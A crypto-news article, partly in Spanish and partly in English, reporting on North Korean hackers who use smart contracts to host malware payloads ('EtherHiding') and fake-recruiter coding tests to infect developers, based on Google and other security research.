Hackers norcoreanos ocultan malware para robar criptomonedas dentro de contratos inteligentes
Los ciberdelincuentes norcoreanos han perfeccionado su técnica: ahora inyectan malware directamente en contratos inteligentes para desviar fondos digitales.
La nueva estrategia de ataque
Utilizan contratos aparentemente legítimos que ejecutan código malicioso en segundo plano. El malware se activa durante transacciones rutinarias, redirigiendo fondos hacia wallets controlados por los hackers.
El modus operandi sofisticado
Los atacantes aprovechan la naturaleza descentralizada de los protocolos DeFi para ocultar su actividad. Los contratos comprometidos pasan desapercibidos en auditorías estándar, operando silenciosamente hasta que ejecutan el robo.
Las víctimas ni siquiera notan el problema hasta que revisan sus balances días después. Para entonces, los fondos ya están siendo lavados a través de múltiples exchanges descentralizados.
Mientras los reguladores siguen debatiendo sobre cómo clasificar las criptomonedas, los hackers ya encontraron la manera de clasificarlas directamente en sus billeteras.
North Korean hackers turn to EtherHiding
Google mentioned that it has linked the usage of EtherHiding to a social engineering campaign tracked by Palo Alto Networks as Contagious Interview. The Contagious Interview was carried out by North Korean actors. According to Socket researchers, the group expanded its operation with a new malware loader, XORIndex. The loader has accumulated thousands of downloads, with the targets being job seekers and individuals believed to own digital assets or sensitive credentials.
In this campaign, the North Korean hackers use JADESNOW malware to distribute a JavaScript variant of INVISIBLEFERRET, which has been used to carry out so many cryptocurrency thefts. The campaign targets developers in the crypto and technology industries, stealing sensitive data, digital assets, and gaining access to corporate networks. It also centers around a social engineering tactic that copies legitimate recruitment processes using fake recruiters and fabricated companies.
Fake recruiters are used to lure candidates to platforms like Telegram or Discord. After that, the malware is then delivered to their systems and devices through fake coding tests or software downloads disguised as technical assessments or interview fixes. The campaign uses a multi-stage malware infection process, which usually involves malware like JADESNOW, INVISIBLEFERRET, and BEAVERTAIL, to compromise the victim’s devices. The malware affects Windows, Linux, and macOS systems.
Researchers detail the cons of EtherHiding
EtherHiding provides a better advantage to attackers, with GTIG noting that it acts as a particularly challenging threat to mitigate. One core element of EtherHiding that is concerning is that it is decentralized in nature. This means that it is stored on a permissionless and decentralized blockchain, making it hard for law enforcement or cybersecurity firms to take it down because it has no central server. The identity of the attacker is also hard to track because of the pseudonymous nature of blockchain transactions.
It is also hard to remove malicious code in smart contracts deployed on the blockchain if you are not the owner of the contract. The attacker in control of the smart contract, in this case, the North Korean hackers, can also choose to update the malicious payload at any time. While security researchers may try to warn the community about a malicious contract by tagging it, it doesn’t stop hackers from carrying out their malicious activities using the smart contract.
In addition, attackers can retrieve their malicious payload using read-only calls that do not leave a visible transaction history on the blockchain, making it hard for researchers to track their activities on the blockchain. According to the threat research report, EtherHiding represents a “shift towards next-generation bulletproof hosting” where the most glaring features of blockchain technology are being used by scammers for malicious purposes.
Join a premium crypto trading community free for 30 days - normally $100/mo.
